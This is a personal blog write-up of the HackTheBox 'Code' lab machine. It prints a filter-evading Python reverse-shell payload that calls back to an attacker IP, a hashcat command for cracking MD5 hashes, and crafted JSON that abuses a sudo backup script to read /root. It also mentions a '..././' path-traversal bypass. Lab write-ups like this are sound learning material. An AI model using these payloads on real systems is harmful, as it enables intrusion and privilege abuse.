Virts

Virts

Virts's Blog ❤️
telegram
github
email
steam
douban

HackTheBox [Code] WriteUp

image

GetShell#

First, obtain the IP, scan the ports, and find that 22 and 5000 are open. It turns out that 5000 is an HTTP service, and upon accessing it, I discovered that Python code can be executed directly, although some dangerous functions are filtered.

I directly used getattr to bypass and spawn a shell, first starting nc to listen.

nc -lv 9443

Then, running the following code will allow for a reverse shell.

o_s = getattr(print.__self__, '__im' + 'port__')('o' + 's')
so = getattr(print.__self__, '__im' + 'port__')('soc' + 'ket')
sub = getattr(print.__self__, '__im' + 'port__')('subpro' + 'cess')
s=so.socket(so.AF_INET,so.SOCK_STREAM);
s.connect(('10.10.14.45',9443));
o_s.dup2(s.fileno(),0);
o_s.dup2(s.fileno(),1);
o_s.dup2(s.fileno(),2);
p=sub.call(['/bin/bash','-i']);

After obtaining the shell, I found an SQLite database named database.db. It contained two users, and I found the MD5 hashed username and password. Comparing with /etc/passwd, I discovered that the user martin exists, so I could crack the password and attempt to brute-force SSH.

Using HashCat to crack the password.

hashcat -m 0 martin.hash rockyou.txt

Successfully cracked the password and logged into SSH. At this point, GetShell was successful.

Privilege Escalation#

Actually, my approach to privilege escalation had some issues; I was only able to access all files under /root, including the flag file, but I did not truly escalate to root. I will note this down.

First, I used ssh -l to check the executable privileged commands and found a /usr/bin/backy.sh.

Upon inspecting its contents, I found that it performs a series of filtering processes on the input $json_file, then hands it over to the binary program backy.

I found the source code for backy on GitHub. Analyzing the source code, I discovered that it actually calls the rsync and tar commands to back up folders, and rsync accepts directories_to_sync from the JSON file as the source path for synchronization.

The /usr/bin/backy.sh only controls the directories_to_archive parameter processed by tar, so I could construct an attack chain like this: first, synchronize the /root folder to the user directory using rsync. The synchronized folder can only be accessed by the root user, so I could then use backy to tar the synchronized folder, and finally download and extract it to see its contents.

First, modify the task.json file.

{
	"destination": "/home/martin/root",
	"multiprocessing": true,
	"verbose_log": false,
	"directories_to_sync": [
		"/root"
	]
}

Then execute sudo backy.sh task.json, at which point the contents of /root will be synchronized to /home/martin/root, and then modify the task.json file.

{
	"destination": "/home/martin/backup",
	"multiprocessing": true,
	"verbose_log": false,
	"directories_to_archive": [
		"/home/martin/root"
	]
}

Execute sudo backy.sh task.json, and you will find the compressed file in /home/martin/backup, extracting it will yield the root flag.

However, there is a very obvious problem with this approach: rsync does not synchronize hidden folders like .ssh, so I cannot escalate to root. Later, I saw other people's WriteUp and found that it was necessary to bypass ../ using double writing, such as ..././. In any case, the challenge was still very interesting.

image

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.